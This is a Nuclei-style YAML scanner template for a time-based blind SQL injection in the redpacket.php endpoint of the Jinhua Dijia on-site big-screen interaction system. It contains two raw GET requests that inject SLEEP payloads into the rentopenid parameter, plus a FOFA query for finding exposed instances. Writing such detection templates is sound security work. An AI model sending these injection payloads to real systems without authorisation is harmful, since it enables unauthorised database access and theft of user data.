http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - |
          GET /mobile/redpacket.php?rentopenid=1"+AND+(SELECT+3710+FROM+(SELECT(SLEEP(4)))eMwG)--+yTBg HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
        - |
          GET /mobile/redpacket.php?rentopenid=1"+AND+(SELECT+3710+FROM+(SELECT(SLEEP(8)))eMwG)--+yTBg HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
id: jinhuadijia-redpacket_php-sql-time
info:
    author: Superhero
    description: |-
        fofa: body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
        金华迪加 现场大屏互动系统 redpacket.php 接口处存在SQL注入漏洞，未授权的攻击者可通过此漏洞获取数据库权限，从而盗取用户数据，造成用户信息泄露。
    name: 金华迪加 现场大屏互动系统 redpacket.php SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/4eYZgI-wOYtSirBG40lSDg
    severity: high
    tags:
        - ntop
